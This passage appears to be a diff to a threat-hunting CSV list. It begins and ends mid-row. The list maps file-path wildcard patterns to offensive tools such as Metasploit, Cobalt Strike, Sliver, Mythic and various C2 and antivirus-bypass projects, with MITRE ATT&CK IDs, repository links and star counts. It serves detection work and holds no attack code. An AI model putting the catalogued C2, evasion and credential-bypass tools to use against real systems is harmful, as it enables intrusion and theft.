security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/BurpSuite-collections*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/BUYTHEAPTDETECTORNOW*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Bypass/payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). 
Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/bypass_mod/loader*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*/BypassAV/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*/bypassAV-1/*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*/BypassCredGuard.git*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/C2/Beacon/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" 
"*/C2/c2.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*/C2/Http/*.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/C2/server.py*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*/C2/SmbListener.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red 
teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - 
T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/C2_Server.git*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/c2_server/resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/C2concealer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/C2Frame.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2Manager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2profile.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 
- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
